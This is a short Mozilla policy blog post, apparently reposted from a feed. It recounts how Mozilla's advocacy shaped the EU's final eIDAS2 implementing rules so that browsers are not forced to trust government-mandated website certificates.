In December, the EU published the final implementing rules for eIDAS2, closing a multi-year fight over proposals that would have required browsers to automatically trust government-mandated website certificates - putting encryption, user trust, and the open web at risk. Through sustained advocacy and deep technical engagement, Mozilla helped secure clear legal safeguards preserving independent browser root programs and strong TLS security. We also ensured that the final standards respect existing security norms and reflect how the web actually works. With all rules now published, users can continue to rely on browsers to verify websites independently with strict security requirements, governments are prevented from weakening web encryption by default, and a dangerous global precedent for state-controlled trust on the internet has been avoided.

This blog is part of a larger series. Be sure to follow Jenn Taylor Hodges on LinkedIn for further insights into Mozilla's policy priorities.

The post Behind the Manifesto: Moments that Mattered in our Fight for the Open Web (2025) appeared first on Open Policy & Advocacy.

19 Dec 2025 3:23pm GMT